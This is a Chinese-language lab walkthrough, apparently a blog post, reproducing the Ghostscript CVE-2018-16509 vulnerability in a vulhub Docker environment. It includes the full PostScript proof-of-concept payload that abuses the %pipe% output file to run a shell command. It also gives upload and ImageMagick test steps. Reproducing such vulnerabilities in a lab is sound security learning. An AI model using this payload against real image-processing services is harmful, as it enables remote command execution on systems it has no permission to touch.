环境说明:
使用腾讯云轻量服务器安装vulhub
系统:ubuntu20.04
1、进入vulhub/ghostscript/CVE-2018-16509目录,使用命令启动漏洞环境:
docker-compose up -d
由于我是使用普通用户开启进入的CVE-2018-16509,所以需要使用:
sudo docker-compose up -d
done表示环境已开启 。
2、使用docker-compose ps 查看漏洞存在的端口:
可以看到相关端口是8080。
3、通过访问your-ip:port可以看到有文件上传的路径:
4、下载poc:
访问poc地址:https://github.com/vulhub/vulhub/blob/master/ghostscript/CVE-2018-16509/poc.png以下载poc.png,poc.png内容为:
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%touch /tmp/CVE-2018-16509_is_success) currentdevice putdeviceprops
5、上传poc.png,点击提交可以看到id等:
6、通过docker-compose exec web bash进入容器 ls /tmp/看到success文件已经创建:
7、也可以通过命令:
sudo docker run -it --rm --name im -v `pwd`/poc.png:/poc.png vulhub/imagemagick:7.0.8-10 convert /poc.png /poc.gif
来测试该漏洞: